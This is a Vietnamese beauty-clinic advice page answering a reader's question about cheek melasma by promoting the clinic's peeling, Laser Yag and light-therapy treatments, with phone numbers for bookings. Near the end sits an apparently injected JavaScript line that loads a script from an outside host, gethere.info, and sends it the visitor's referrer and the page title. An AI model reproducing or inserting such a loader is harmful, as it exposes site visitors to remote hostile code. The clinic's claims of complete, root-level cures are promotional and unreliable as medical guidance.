Những bí quyết trị nám da mặt vùng má an toàn nhất

0

Chào bác sĩ! Da mặt cháu bị nám nhiều ở hai bên gò má. Bác sĩ có thể cho cháu bí quyết trị nám da mặt vùng má hiệu quả và an toàn hiện nay được không ạ? Cháu cảm ơn bác sĩ.(Lan Anh – Hải Phòng)

TRẢ LỜI:

Lan Anh thân mến!

Cảm ơn bạn đã quan tâm và gửi câu hỏi xoay quanh vấn đề trị nám da mặt vùng má tới chuyên mục tư vấn của thẩm mỹ viện Phú Xuân. Với câu hỏi của bạn, chúng tôi xin giải đáp như sau:

Làn da là một trong những điểm tạo ấn tượng khó phai đối với người đối diện. Do đó, khi da có khuyết điểm như mụn, nám da sẽ khiến chonhiều chị em cảm thấy thiếu tự tin trong cuộc sống và công việc. Để khắc phục khuyết điểm của mình, nhiều chị em đã tìm mọi cách trị nám da mặt vùng má tại nhà nhưng vẫn bị tái phát.

Trị nám vùng má giúp bạn lấy lại làn da trắng sáng
Trị nám vùng má giúp bạn lấy lại làn da trắng sáng

Nếu áp dụng các cách trị nám vùng má từ thiên nhiên không hiệu quả, chúng tôi khuyên bạn nên sử dụng 1 trong 3 phương pháp trị nám da mặt vùng má hiệu quả dưới đây tại thẩm mỹ viện Phú Xuân:

Công nghệ đặc trị nám sâu bằng Laser Yag tại Phú Xuân
Công nghệ đặc trị nám sâu bằng Laser Yag tại Phú Xuân

+ Nếu vùng má của bạn bị nám mảng thì phương pháp trị nám mảng hiện đại của Phú Xuân bằng công nghệ Peeling sẽ giúp “đánh bay” hoàn toàn nám mảng, giúp khách hàng lấy lại nét tươi trẻ và vẻ đẹp mịn màng cho làn da chỉ sau một liệu trình ngắn.

+ Trong trường hợp vùng má của bạn bị nám sâu thì bạn sẽ được áp dụng sử dụng phương pháp trị nám da mặt vùng má bằng công nghệ Laser Yag hiện đại.

+ Công nghệ trị nám cao cấp từ ánh sáng sinh học New Elight sẽ giúp bạn điều trị nám hỗn hợp tận gốc trong thời gian nhanh nhất nếu vùng má của khách hàng bị nám da hỗn hợp.

Đây là 3 phương pháp giúp trị nám da mặt vùng má được khách hàng đến với Phú Xuân đánh giá là hiệu quả, nhanh chóng và an toàn. Vì vậy, Lan Anh có thể đến trực tiếp Phú Xuân để được các bác sĩ tư vấn và thăm khám miễn phí về cách trị nám vùng má hiệu quả và an toàn nhé.

Hãy liên hệ với chúng tôi theo số máy 0946817777 nếu cần tư vấn dịch vụ hoặc đặt lịch thăm khám sớm nhất.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Đăng kí miễn phí

Tư vấn 24/7: 094 681 7777 - 0125 443 7777

TIN LIÊN QUAN

KHÁCH HÀNG QUAN TÂM

Bình luận mặc định Bình luận Facebook

NO COMMENTS

LEAVE A REPLY